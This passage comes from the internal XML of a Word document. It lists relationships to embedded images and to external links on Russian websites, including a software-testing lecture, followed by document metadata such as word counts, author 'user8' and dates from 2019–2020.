Target="https://www.white-windows.ru/wp-content/uploads/2015/07/img_2076.jpg" TargetMode="External"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image206.jpeg"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image244.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.jpeg"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image142.jpeg"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.intuit.ru/department/se/testing/9/testing_9.html" TargetMode="External"/><Relationship Id="rId436" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kompkimi.ru/?attachment_id=3114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72EE2E2-5ADE-460F-AE37-9521AC6E6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97533</Words>
  <Characters>555942</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>4632</Lines>
  <Paragraphs>1304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652171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user8</dc:creator>
  <cp:lastModifiedBy>user8</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <cp:lastPrinted>2018-03-07T07:55:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-12-17T08:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-02-28T08:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>